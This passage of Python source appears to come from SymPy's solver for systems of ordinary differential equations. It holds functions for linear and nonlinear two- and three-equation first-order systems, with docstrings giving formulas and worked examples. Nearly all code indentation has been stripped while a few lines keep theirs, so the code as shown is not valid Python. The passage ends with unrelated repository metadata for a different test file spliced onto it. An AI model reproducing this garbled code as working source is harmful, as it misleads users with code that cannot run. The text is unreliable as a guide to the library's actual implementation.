equ = diff(x(t),t) - r['a']*x(t) - r['b']*(s*x(t) + C1*exp(-s*Integral(r['b'] - r['d']/s, t)))
hint1 = classify_ode(equ)[1]
sol1 = dsolve(equ, hint=hint1+'_Integral').rhs
sol2 = s*sol1 + C1*exp(-s*Integral(r['b'] - r['d']/s, t))
elif p ==2:
equ = diff(y(t),t) - r['c']*y(t) - r['d']*s*y(t) + C1*exp(-s*Integral(r['d'] - r['b']/s, t))
hint1 = classify_ode(equ)[1]
sol2 = dsolve(equ, hint=hint1+'_Integral').rhs
sol1 = s*sol2 + C1*exp(-s*Integral(r['d'] - r['b']/s, t))
return [Eq(x(t), sol1), Eq(y(t), sol2)]
def _linear_2eq_order1_type7(x, y, t, r, eq):
r"""
    The equations of this type of ODE are
.. math:: x' = f(t) x + g(t) y
.. math:: y' = h(t) x + p(t) y
    Differentiating the first equation and substituting the value of `y`
    from the second equation gives a second-order linear equation
.. math:: g x'' - (fg + gp + g') x' + (fgp - g^{2} h + f g' - f' g) x = 0
    The above equation can be easily integrated if one of the following conditions is satisfied.
    1. `fgp - g^{2} h + f g' - f' g = 0`
    2. `fgp - g^{2} h + f g' - f' g = ag, fg + gp + g' = bg`
    If the first condition is satisfied, it is solved by the current dsolve solver; in the second case it becomes
    a constant-coefficient differential equation, which is also solved by the current solver.
    Otherwise, if both conditions fail,
    a particular solution is assumed as `x = x_0(t)` and `y = y_0(t)`.
    Then the general solution is expressed as
.. math:: x = C_1 x_0(t) + C_2 x_0(t) \int \frac{g(t) F(t) P(t)}{x_0^{2}(t)} \,dt
.. math:: y = C_1 y_0(t) + C_2 [\frac{F(t) P(t)}{x_0(t)} + y_0(t) \int \frac{g(t) F(t) P(t)}{x_0^{2}(t)} \,dt]
    where `C_1` and `C_2` are arbitrary constants and
.. math:: F(t) = e^{\int f(t) \,dt} , P(t) = e^{\int p(t) \,dt}
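    For instance, the system `x' = t x + y`, `y' = -x` (here `f = t`, `g = 1`, `h = -1`,
    `p = 0`) satisfies the first condition, and the reduced second-order equation is
    simply `x'' - t x' = 0`.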
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
e1 = r['a']*r['b']*r['c'] - r['b']**2*r['c'] + r['a']*diff(r['b'],t) - diff(r['a'],t)*r['b']
e2 = r['a']*r['c']*r['d'] - r['b']*r['c']**2 + diff(r['c'],t)*r['d'] - r['c']*diff(r['d'],t)
m1 = r['a']*r['b'] + r['b']*r['d'] + diff(r['b'],t)
m2 = r['a']*r['c'] + r['c']*r['d'] + diff(r['c'],t)
if e1 == 0:
sol1 = dsolve(r['b']*diff(x(t),t,t) - m1*diff(x(t),t)).rhs
sol2 = dsolve(diff(y(t),t) - r['c']*sol1 - r['d']*y(t)).rhs
elif e2 == 0:
sol2 = dsolve(r['c']*diff(y(t),t,t) - m2*diff(y(t),t)).rhs
sol1 = dsolve(diff(x(t),t) - r['a']*x(t) - r['b']*sol2).rhs
elif not (e1/r['b']).has(t) and not (m1/r['b']).has(t):
sol1 = dsolve(diff(x(t),t,t) - (m1/r['b'])*diff(x(t),t) - (e1/r['b'])*x(t)).rhs
sol2 = dsolve(diff(y(t),t) - r['c']*sol1 - r['d']*y(t)).rhs
elif not (e2/r['c']).has(t) and not (m2/r['c']).has(t):
sol2 = dsolve(diff(y(t),t,t) - (m2/r['c'])*diff(y(t),t) - (e2/r['c'])*y(t)).rhs
sol1 = dsolve(diff(x(t),t) - r['a']*x(t) - r['b']*sol2).rhs
else:
x0 = Function('x0')(t) # x0 and y0 being particular solutions
y0 = Function('y0')(t)
F = exp(Integral(r['a'],t))
P = exp(Integral(r['d'],t))
sol1 = C1*x0 + C2*x0*Integral(r['b']*F*P/x0**2, t)
sol2 = C1*y0 + C2*(F*P/x0 + y0*Integral(r['b']*F*P/x0**2, t))
return [Eq(x(t), sol1), Eq(y(t), sol2)]
def sysode_nonlinear_2eq_order1(match_):
func = match_['func']
eq = match_['eq']
fc = match_['func_coeff']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
if match_['type_of_equation'] == 'type5':
sol = _nonlinear_2eq_order1_type5(func, t, eq)
return sol
x = func[0].func
y = func[1].func
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
if match_['type_of_equation'] == 'type1':
sol = _nonlinear_2eq_order1_type1(x, y, t, eq)
elif match_['type_of_equation'] == 'type2':
sol = _nonlinear_2eq_order1_type2(x, y, t, eq)
elif match_['type_of_equation'] == 'type3':
sol = _nonlinear_2eq_order1_type3(x, y, t, eq)
elif match_['type_of_equation'] == 'type4':
sol = _nonlinear_2eq_order1_type4(x, y, t, eq)
return sol
def _nonlinear_2eq_order1_type1(x, y, t, eq):
r"""
Equations:
.. math:: x' = x^n F(x,y)
.. math:: y' = g(y) F(x,y)
Solution:
.. math:: x = \varphi(y), \int \frac{1}{g(y) F(\varphi(y),y)} \,dy = t + C_2
where
if `n \neq 1`
.. math:: \varphi = [C_1 + (1-n) \int \frac{1}{g(y)} \,dy]^{\frac{1}{1-n}}
if `n = 1`
.. math:: \varphi = C_1 e^{\int \frac{1}{g(y)} \,dy}
where `C_1` and `C_2` are arbitrary constants.
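    For instance, for `x' = x^{2} F(x,y)`, `y' = F(x,y)` (so `n = 2` and `g(y) = 1`) one
    gets `\varphi(y) = \frac{1}{C_1 - y}`, and the remaining quadrature is
    `\int \frac{1}{F(\varphi(y), y)} \,dy = t + C_2`.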
"""
C1, C2 = get_numbered_constants(eq, num=2)
n = Wild('n', exclude=[x(t),y(t)])
f = Wild('f')
u, v = symbols('u, v')
r = eq[0].match(diff(x(t),t) - x(t)**n*f)
g = ((diff(y(t),t) - eq[1])/r[f]).subs(y(t),v)
F = r[f].subs(x(t),u).subs(y(t),v)
n = r[n]
if n!=1:
phi = (C1 + (1-n)*Integral(1/g, v))**(1/(1-n))
else:
phi = C1*exp(Integral(1/g, v))
phi = phi.doit()
sol2 = solve(Integral(1/(g*F.subs(u,phi)), v).doit() - t - C2, v)
sol = []
for sols in sol2:
sol.append(Eq(x(t),phi.subs(v, sols)))
sol.append(Eq(y(t), sols))
return sol
def _nonlinear_2eq_order1_type2(x, y, t, eq):
r"""
Equations:
.. math:: x' = e^{\lambda x} F(x,y)
.. math:: y' = g(y) F(x,y)
Solution:
.. math:: x = \varphi(y), \int \frac{1}{g(y) F(\varphi(y),y)} \,dy = t + C_2
where
if `\lambda \neq 0`
.. math:: \varphi = -\frac{1}{\lambda} log(C_1 - \lambda \int \frac{1}{g(y)} \,dy)
if `\lambda = 0`
.. math:: \varphi = C_1 + \int \frac{1}{g(y)} \,dy
where `C_1` and `C_2` are arbitrary constants.
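    For instance, for `x' = e^{x} F(x,y)`, `y' = F(x,y)` (so `\lambda = 1` and `g(y) = 1`)
    one gets `\varphi(y) = -\log(C_1 - y)`, and the remaining quadrature is
    `\int \frac{1}{F(\varphi(y), y)} \,dy = t + C_2`.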
"""
C1, C2 = get_numbered_constants(eq, num=2)
n = Wild('n', exclude=[x(t),y(t)])
f = Wild('f')
u, v = symbols('u, v')
r = eq[0].match(diff(x(t),t) - exp(n*x(t))*f)
g = ((diff(y(t),t) - eq[1])/r[f]).subs(y(t),v)
F = r[f].subs(x(t),u).subs(y(t),v)
n = r[n]
if n:
phi = -1/n*log(C1 - n*Integral(1/g, v))
else:
phi = C1 + Integral(1/g, v)
phi = phi.doit()
sol2 = solve(Integral(1/(g*F.subs(u,phi)), v).doit() - t - C2, v)
sol = []
for sols in sol2:
sol.append(Eq(x(t),phi.subs(v, sols)))
sol.append(Eq(y(t), sols))
return sol
def _nonlinear_2eq_order1_type3(x, y, t, eq):
r"""
Autonomous system of general form
.. math:: x' = F(x,y)
.. math:: y' = G(x,y)
    Assume that `y = y(x, C_1)`, where `C_1` is an arbitrary constant, is the general
    solution of the first-order equation
.. math:: F(x,y) y'_x = G(x,y)
Then the general solution of the original system of equations has the form
    .. math:: \int \frac{1}{F(x,y(x,C_1))} \,dx = t + C_2
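    For instance, for `x' = y`, `y' = x` one first solves `y \frac{dy}{dx} = x`, giving
    `y = \sqrt{x^{2} + C_1}`, and then `\int \frac{1}{\sqrt{x^{2} + C_1}} \,dx = t + C_2`
    determines `x(t)`.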
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
v = Function('v')
u = Symbol('u')
f = Wild('f')
g = Wild('g')
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
F = r1[f].subs(x(t), u).subs(y(t), v(u))
G = r2[g].subs(x(t), u).subs(y(t), v(u))
sol2r = dsolve(Eq(diff(v(u), u), G/F))
if isinstance(sol2r, Expr):
sol2r = [sol2r]
for sol2s in sol2r:
sol1 = solve(Integral(1/F.subs(v(u), sol2s.rhs), u).doit() - t - C2, u)
sol = []
for sols in sol1:
sol.append(Eq(x(t), sols))
sol.append(Eq(y(t), (sol2s.rhs).subs(u, sols)))
return sol
def _nonlinear_2eq_order1_type4(x, y, t, eq):
r"""
Equation:
.. math:: x' = f_1(x) g_1(y) \phi(x,y,t)
.. math:: y' = f_2(x) g_2(y) \phi(x,y,t)
First integral:
.. math:: \int \frac{f_2(x)}{f_1(x)} \,dx - \int \frac{g_1(y)}{g_2(y)} \,dy = C
where `C` is an arbitrary constant.
On solving the first integral for `x` (resp., `y` ) and on substituting the
    resulting expression into either equation of the original system, one
arrives at a first-order equation for determining `y` (resp., `x` ).
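    For instance, for `x' = x y^{2} \phi(x,y,t)`, `y' = x^{2} y \phi(x,y,t)` (so
    `f_1 = x`, `g_1 = y^{2}`, `f_2 = x^{2}`, `g_2 = y`) the first integral is
    `\frac{x^{2}}{2} - \frac{y^{2}}{2} = C`.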
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v = symbols('u, v')
U, V = symbols('U, V', cls=Function)
f = Wild('f')
g = Wild('g')
f1 = Wild('f1', exclude=[v,t])
f2 = Wild('f2', exclude=[v,t])
g1 = Wild('g1', exclude=[u,t])
g2 = Wild('g2', exclude=[u,t])
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
num, den = (
(r1[f].subs(x(t),u).subs(y(t),v))/
(r2[g].subs(x(t),u).subs(y(t),v))).as_numer_denom()
R1 = num.match(f1*g1)
R2 = den.match(f2*g2)
phi = (r1[f].subs(x(t),u).subs(y(t),v))/num
F1 = R1[f1]; F2 = R2[f2]
G1 = R1[g1]; G2 = R2[g2]
sol1r = solve(Integral(F2/F1, u).doit() - Integral(G1/G2,v).doit() - C1, u)
sol2r = solve(Integral(F2/F1, u).doit() - Integral(G1/G2,v).doit() - C1, v)
sol = []
for sols in sol1r:
sol.append(Eq(y(t), dsolve(diff(V(t),t) - F2.subs(u,sols).subs(v,V(t))*G2.subs(v,V(t))*phi.subs(u,sols).subs(v,V(t))).rhs))
for sols in sol2r:
sol.append(Eq(x(t), dsolve(diff(U(t),t) - F1.subs(u,U(t))*G1.subs(v,sols).subs(u,U(t))*phi.subs(v,sols).subs(u,U(t))).rhs))
return set(sol)
def _nonlinear_2eq_order1_type5(func, t, eq):
r"""
Clairaut system of ODEs
.. math:: x = t x' + F(x',y')
.. math:: y = t y' + G(x',y')
The following are solutions of the system
`(i)` straight lines:
.. math:: x = C_1 t + F(C_1, C_2), y = C_2 t + G(C_1, C_2)
where `C_1` and `C_2` are arbitrary constants;
`(ii)` envelopes of the above lines;
`(iii)` continuously differentiable lines made up from segments of the lines
`(i)` and `(ii)`.
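    For instance, the system `x = t x' + (x')^{2}`, `y = t y' + (y')^{2}` has the
    straight-line solutions `x = C_1 t + C_1^{2}`, `y = C_2 t + C_2^{2}`.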
"""
C1, C2 = get_numbered_constants(eq, num=2)
f = Wild('f')
g = Wild('g')
def check_type(x, y):
r1 = eq[0].match(t*diff(x(t),t) - x(t) + f)
r2 = eq[1].match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = eq[0].match(diff(x(t),t) - x(t)/t + f/t)
r2 = eq[1].match(diff(y(t),t) - y(t)/t + g/t)
if not (r1 and r2):
r1 = (-eq[0]).match(t*diff(x(t),t) - x(t) + f)
r2 = (-eq[1]).match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = (-eq[0]).match(diff(x(t),t) - x(t)/t + f/t)
r2 = (-eq[1]).match(diff(y(t),t) - y(t)/t + g/t)
return [r1, r2]
for func_ in func:
if isinstance(func_, list):
x = func[0][0].func
y = func[0][1].func
[r1, r2] = check_type(x, y)
if not (r1 and r2):
[r1, r2] = check_type(y, x)
x, y = y, x
x1 = diff(x(t),t); y1 = diff(y(t),t)
return {Eq(x(t), C1*t + r1[f].subs(x1,C1).subs(y1,C2)), Eq(y(t), C2*t + r2[g].subs(x1,C1).subs(y1,C2))}
def sysode_nonlinear_3eq_order1(match_):
x = match_['func'][0].func
y = match_['func'][1].func
z = match_['func'][2].func
eq = match_['eq']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
if match_['type_of_equation'] == 'type1':
sol = _nonlinear_3eq_order1_type1(x, y, z, t, eq)
if match_['type_of_equation'] == 'type2':
sol = _nonlinear_3eq_order1_type2(x, y, z, t, eq)
if match_['type_of_equation'] == 'type3':
sol = _nonlinear_3eq_order1_type3(x, y, z, t, eq)
if match_['type_of_equation'] == 'type4':
sol = _nonlinear_3eq_order1_type4(x, y, z, t, eq)
if match_['type_of_equation'] == 'type5':
sol = _nonlinear_3eq_order1_type5(x, y, z, t, eq)
return sol
def _nonlinear_3eq_order1_type1(x, y, z, t, eq):
r"""
Equations:
.. math:: a x' = (b - c) y z, \enspace b y' = (c - a) z x, \enspace c z' = (a - b) x y
First Integrals:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
.. math:: a^{2} x^{2} + b^{2} y^{2} + c^{2} z^{2} = C_2
where `C_1` and `C_2` are arbitrary constants. On solving the integrals for `y` and
`z` and on substituting the resulting expressions into the first equation of the
    system, one arrives at a separable first-order equation in `x`. Doing the same
    for the other two equations yields first-order equations in `y` and `z` as well.
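    For instance, with `a = 1`, `b = 2`, `c = 3` the first integrals read
    `x^{2} + 2 y^{2} + 3 z^{2} = C_1` and `x^{2} + 4 y^{2} + 9 z^{2} = C_2`, from which
    `y` and `z` can be expressed in terms of `x` alone.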
References
==========
    - http://eqworld.ipmnet.ru/en/solutions/sysode/sode0401.pdf
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v, w = symbols('u, v, w')
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
r = (diff(x(t),t) - eq[0]).match(p*y(t)*z(t))
r.update((diff(y(t),t) - eq[1]).match(q*z(t)*x(t)))
r.update((diff(z(t),t) - eq[2]).match(s*x(t)*y(t)))
n1, d1 = r[p].as_numer_denom()
n2, d2 = r[q].as_numer_denom()
n3, d3 = r[s].as_numer_denom()
val = solve([n1*u-d1*v+d1*w, d2*u+n2*v-d2*w, d3*u-d3*v-n3*w],[u,v])
vals = [val[v], val[u]]
c = lcm(vals[0].as_numer_denom()[1], vals[1].as_numer_denom()[1])
b = vals[0].subs(w, c)
a = vals[1].subs(w, c)
y_x = sqrt(((c*C1-C2) - a*(c-a)*x(t)**2)/(b*(c-b)))
z_x = sqrt(((b*C1-C2) - a*(b-a)*x(t)**2)/(c*(b-c)))
z_y = sqrt(((a*C1-C2) - b*(a-b)*y(t)**2)/(c*(a-c)))
x_y = sqrt(((c*C1-C2) - b*(c-b)*y(t)**2)/(a*(c-a)))
x_z = sqrt(((b*C1-C2) - c*(b-c)*z(t)**2)/(a*(b-a)))
y_z = sqrt(((a*C1-C2) - c*(a-c)*z(t)**2)/(b*(a-b)))
sol1 = dsolve(a*diff(x(t),t) - (b-c)*y_x*z_x)
sol2 = dsolve(b*diff(y(t),t) - (c-a)*z_y*x_y)
sol3 = dsolve(c*diff(z(t),t) - (a-b)*x_z*y_z)
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type2(x, y, z, t, eq):
r"""
Equations:
.. math:: a x' = (b - c) y z f(x, y, z, t)
.. math:: b y' = (c - a) z x f(x, y, z, t)
.. math:: c z' = (a - b) x y f(x, y, z, t)
First Integrals:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
.. math:: a^{2} x^{2} + b^{2} y^{2} + c^{2} z^{2} = C_2
where `C_1` and `C_2` are arbitrary constants. On solving the integrals for `y` and
`z` and on substituting the resulting expressions into the first equation of the
    system, one arrives at a first-order differential equation in `x`. Doing the same
    for the other two equations yields first-order equations in `y` and `z`.
References
==========
    - http://eqworld.ipmnet.ru/en/solutions/sysode/sode0402.pdf
"""
C1, C2 = get_numbered_constants(eq, num=2)
u, v, w = symbols('u, v, w')
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
f = Wild('f')
r1 = (diff(x(t),t) - eq[0]).match(y(t)*z(t)*f)
r = collect_const(r1[f]).match(p*f)
r.update(((diff(y(t),t) - eq[1])/r[f]).match(q*z(t)*x(t)))
r.update(((diff(z(t),t) - eq[2])/r[f]).match(s*x(t)*y(t)))
n1, d1 = r[p].as_numer_denom()
n2, d2 = r[q].as_numer_denom()
n3, d3 = r[s].as_numer_denom()
val = solve([n1*u-d1*v+d1*w, d2*u+n2*v-d2*w, -d3*u+d3*v+n3*w],[u,v])
vals = [val[v], val[u]]
c = lcm(vals[0].as_numer_denom()[1], vals[1].as_numer_denom()[1])
a = vals[0].subs(w, c)
b = vals[1].subs(w, c)
y_x = sqrt(((c*C1-C2) - a*(c-a)*x(t)**2)/(b*(c-b)))
z_x = sqrt(((b*C1-C2) - a*(b-a)*x(t)**2)/(c*(b-c)))
z_y = sqrt(((a*C1-C2) - b*(a-b)*y(t)**2)/(c*(a-c)))
x_y = sqrt(((c*C1-C2) - b*(c-b)*y(t)**2)/(a*(c-a)))
x_z = sqrt(((b*C1-C2) - c*(b-c)*z(t)**2)/(a*(b-a)))
y_z = sqrt(((a*C1-C2) - c*(a-c)*z(t)**2)/(b*(a-b)))
sol1 = dsolve(a*diff(x(t),t) - (b-c)*y_x*z_x*r[f])
sol2 = dsolve(b*diff(y(t),t) - (c-a)*z_y*x_y*r[f])
sol3 = dsolve(c*diff(z(t),t) - (a-b)*x_z*y_z*r[f])
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type3(x, y, z, t, eq):
r"""
Equations:
.. math:: x' = c F_2 - b F_3, \enspace y' = a F_3 - c F_1, \enspace z' = b F_1 - a F_2
where `F_n = F_n(x, y, z, t)`.
1. First Integral:
.. math:: a x + b y + c z = C_1,
    where `C_1` is an arbitrary constant.
    2. If we assume the function `F_n` to be independent of `t`, i.e. `F_n = F_n(x, y, z)`,
    then, on eliminating `t` and `z` from the first two equations of the system, one
arrives at the first-order equation
.. math:: \frac{dy}{dx} = \frac{a F_3 (x, y, z) - c F_1 (x, y, z)}{c F_2 (x, y, z) -
b F_3 (x, y, z)}
where `z = \frac{1}{c} (C_1 - a x - b y)`
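    For instance, for `x' = x - y`, `y' = y - z`, `z' = z - x` (so `a = b = c = 1`,
    `F_1 = z`, `F_2 = x`, `F_3 = y`) one has `x + y + z = C_1`, and the reduced equation
    is `\frac{dy}{dx} = \frac{y - z}{x - y}` with `z = C_1 - x - y`.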
References
==========
    - http://eqworld.ipmnet.ru/en/solutions/sysode/sode0404.pdf
"""
C1 = get_numbered_constants(eq, num=1)
u, v, w = symbols('u, v, w')
fu, fv, fw = symbols('u, v, w', cls=Function)
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = (diff(x(t), t) - eq[0]).match(F2-F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t), t) - eq[1]).match(p*r[F3] - r[s]*F1))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t), u).subs(y(t),v).subs(z(t), w)
F2 = r[F2].subs(x(t), u).subs(y(t),v).subs(z(t), w)
F3 = r[F3].subs(x(t), u).subs(y(t),v).subs(z(t), w)
z_xy = (C1-a*u-b*v)/c
y_zx = (C1-a*u-c*w)/b
x_yz = (C1-b*v-c*w)/a
y_x = dsolve(diff(fv(u),u) - ((a*F3-c*F1)/(c*F2-b*F3)).subs(w,z_xy).subs(v,fv(u))).rhs
z_x = dsolve(diff(fw(u),u) - ((b*F1-a*F2)/(c*F2-b*F3)).subs(v,y_zx).subs(w,fw(u))).rhs
z_y = dsolve(diff(fw(v),v) - ((b*F1-a*F2)/(a*F3-c*F1)).subs(u,x_yz).subs(w,fw(v))).rhs
x_y = dsolve(diff(fu(v),v) - ((c*F2-b*F3)/(a*F3-c*F1)).subs(w,z_xy).subs(u,fu(v))).rhs
y_z = dsolve(diff(fv(w),w) - ((a*F3-c*F1)/(b*F1-a*F2)).subs(u,x_yz).subs(v,fv(w))).rhs
x_z = dsolve(diff(fu(w),w) - ((c*F2-b*F3)/(b*F1-a*F2)).subs(v,y_zx).subs(u,fu(w))).rhs
sol1 = dsolve(diff(fu(t),t) - (c*F2 - b*F3).subs(v,y_x).subs(w,z_x).subs(u,fu(t))).rhs
sol2 = dsolve(diff(fv(t),t) - (a*F3 - c*F1).subs(u,x_y).subs(w,z_y).subs(v,fv(t))).rhs
sol3 = dsolve(diff(fw(t),t) - (b*F1 - a*F2).subs(u,x_z).subs(v,y_z).subs(w,fw(t))).rhs
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type4(x, y, z, t, eq):
r"""
Equations:
.. math:: x' = c z F_2 - b y F_3, \enspace y' = a x F_3 - c z F_1, \enspace z' = b y F_1 - a x F_2
where `F_n = F_n (x, y, z, t)`
1. First integral:
.. math:: a x^{2} + b y^{2} + c z^{2} = C_1
    where `C_1` is an arbitrary constant.
2. Assuming the function `F_n` is independent of `t`: `F_n = F_n (x, y, z)`. Then on
eliminating `t` and `z` from the first two equations of the system, one arrives at
the first-order equation
.. math:: \frac{dy}{dx} = \frac{a x F_3 (x, y, z) - c z F_1 (x, y, z)}
{c z F_2 (x, y, z) - b y F_3 (x, y, z)}
where `z = \pm \sqrt{\frac{1}{c} (C_1 - a x^{2} - b y^{2})}`
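    For instance, for `x' = z - y`, `y' = x - z`, `z' = y - x` (so `a = b = c = 1` and
    `F_1 = F_2 = F_3 = 1`) one has `x^{2} + y^{2} + z^{2} = C_1`, and the reduced equation
    is `\frac{dy}{dx} = \frac{x - z}{z - y}` with `z = \sqrt{C_1 - x^{2} - y^{2}}`.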
References
==========
    - http://eqworld.ipmnet.ru/en/solutions/sysode/sode0405.pdf
"""
C1 = get_numbered_constants(eq, num=1)
    u, v, w = symbols('u, v, w')
    # Undefined functions are needed below because plain Symbols are not callable
    # (same pattern as in the type3 and type5 solvers).
    fu, fv, fw = symbols('u, v, w', cls=Function)
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = eq[0].match(diff(x(t),t) - z(t)*F2 + y(t)*F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t),t) - eq[1]).match(p*x(t)*r[F3] - r[s]*z(t)*F1))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t),u).subs(y(t),v).subs(z(t),w)
F2 = r[F2].subs(x(t),u).subs(y(t),v).subs(z(t),w)
F3 = r[F3].subs(x(t),u).subs(y(t),v).subs(z(t),w)
x_yz = sqrt((C1 - b*v**2 - c*w**2)/a)
y_zx = sqrt((C1 - c*w**2 - a*u**2)/b)
z_xy = sqrt((C1 - a*u**2 - b*v**2)/c)
    y_x = dsolve(diff(fv(u),u) - ((a*u*F3-c*w*F1)/(c*w*F2-b*v*F3)).subs(w,z_xy).subs(v,fv(u))).rhs
    z_x = dsolve(diff(fw(u),u) - ((b*v*F1-a*u*F2)/(c*w*F2-b*v*F3)).subs(v,y_zx).subs(w,fw(u))).rhs
    z_y = dsolve(diff(fw(v),v) - ((b*v*F1-a*u*F2)/(a*u*F3-c*w*F1)).subs(u,x_yz).subs(w,fw(v))).rhs
    x_y = dsolve(diff(fu(v),v) - ((c*w*F2-b*v*F3)/(a*u*F3-c*w*F1)).subs(w,z_xy).subs(u,fu(v))).rhs
    y_z = dsolve(diff(fv(w),w) - ((a*u*F3-c*w*F1)/(b*v*F1-a*u*F2)).subs(u,x_yz).subs(v,fv(w))).rhs
    x_z = dsolve(diff(fu(w),w) - ((c*w*F2-b*v*F3)/(b*v*F1-a*u*F2)).subs(v,y_zx).subs(u,fu(w))).rhs
    sol1 = dsolve(diff(fu(t),t) - (c*w*F2 - b*v*F3).subs(v,y_x).subs(w,z_x).subs(u,fu(t))).rhs
    sol2 = dsolve(diff(fv(t),t) - (a*u*F3 - c*w*F1).subs(u,x_y).subs(w,z_y).subs(v,fv(t))).rhs
    sol3 = dsolve(diff(fw(t),t) - (b*v*F1 - a*u*F2).subs(u,x_z).subs(v,y_z).subs(w,fw(t))).rhs
return [sol1, sol2, sol3]
def _nonlinear_3eq_order1_type5(x, y, z, t, eq):
r"""
.. math:: x' = x (c F_2 - b F_3), \enspace y' = y (a F_3 - c F_1), \enspace z' = z (b F_1 - a F_2)
    where the `F_n = F_n (x, y, z, t)` are arbitrary functions.
First Integral:
.. math:: \left|x\right|^{a} \left|y\right|^{b} \left|z\right|^{c} = C_1
    where `C_1` is an arbitrary constant. If the function `F_n` is independent of `t`,
then, by eliminating `t` and `z` from the first two equations of the system, one
arrives at a first-order equation.
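    For instance, for `x' = x`, `y' = -2 y`, `z' = z` (so `a = 1`, `b = 2`, `c = 3` and
    `F_1 = F_2 = F_3 = 1`) the quantity `\left|x\right| \left|y\right|^{2} \left|z\right|^{3}`
    is conserved.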
References
==========
    - http://eqworld.ipmnet.ru/en/solutions/sysode/sode0406.pdf
"""
C1 = get_numbered_constants(eq, num=1)
u, v, w = symbols('u, v, w')
fu, fv, fw = symbols('u, v, w', cls=Function)
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = eq[0].match(diff(x(t), t) - x(t)*F2 + x(t)*F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t), t) - eq[1]).match(y(t)*(p*r[F3] - r[s]*F1)))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t), u).subs(y(t), v).subs(z(t), w)
F2 = r[F2].subs(x(t), u).subs(y(t), v).subs(z(t), w)
F3 = r[F3].subs(x(t), u).subs(y(t), v).subs(z(t), w)
x_yz = (C1*v**-b*w**-c)**-a
y_zx = (C1*w**-c*u**-a)**-b
z_xy = (C1*u**-a*v**-b)**-c
y_x = dsolve(diff(fv(u), u) - ((v*(a*F3 - c*F1))/(u*(c*F2 - b*F3))).subs(w, z_xy).subs(v, fv(u))).rhs
z_x = dsolve(diff(fw(u), u) - ((w*(b*F1 - a*F2))/(u*(c*F2 - b*F3))).subs(v, y_zx).subs(w, fw(u))).rhs
z_y = dsolve(diff(fw(v), v) - ((w*(b*F1 - a*F2))/(v*(a*F3 - c*F1))).subs(u, x_yz).subs(w, fw(v))).rhs
x_y = dsolve(diff(fu(v), v) - ((u*(c*F2 - b*F3))/(v*(a*F3 - c*F1))).subs(w, z_xy).subs(u, fu(v))).rhs
y_z = dsolve(diff(fv(w), w) - ((v*(a*F3 - c*F1))/(w*(b*F1 - a*F2))).subs(u, x_yz).subs(v, fv(w))).rhs
x_z = dsolve(diff(fu(w), w) - ((u*(c*F2 - b*F3))/(w*(b*F1 - a*F2))).subs(v, y_zx).subs(u, fu(w))).rhs
sol1 = dsolve(diff(fu(t), t) - (u*(c*F2 - b*F3)).subs(v, y_x).subs(w, z_x).subs(u, fu(t))).rhs
sol2 = dsolve(diff(fv(t), t) - (v*(a*F3 - c*F1)).subs(u, x_y).subs(w, z_y).subs(v, fv(t))).rhs
sol3 = dsolve(diff(fw(t), t) - (w*(b*F1 - a*F2)).subs(u, x_z).subs(v, y_z).subs(w, fw(t))).rhs
return [sol1, sol2, sol3]
#This import is written at the bottom to avoid circular imports.
from .single import (NthAlgebraic, Factorable, FirstLinear, AlmostLinear,
Bernoulli, SingleODEProblem, SingleODESolver, RiccatiSpecial)
| 39.039166
| 256
| 0.560834
|
7a5115d8cc0dc7569d64dd2bc9cef714afccc648
| 10,560
|
py
|
Python
|
tests/monte_carlo_test.py
|
DarrenZhang01/Neural_Tangents_TensorFlow
|
2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 4
|
2020-12-25T17:37:13.000Z
|
2022-01-03T17:00:23.000Z
|
tests/monte_carlo_test.py
|
DarrenZhang01/TensorFlow_GSoC
|
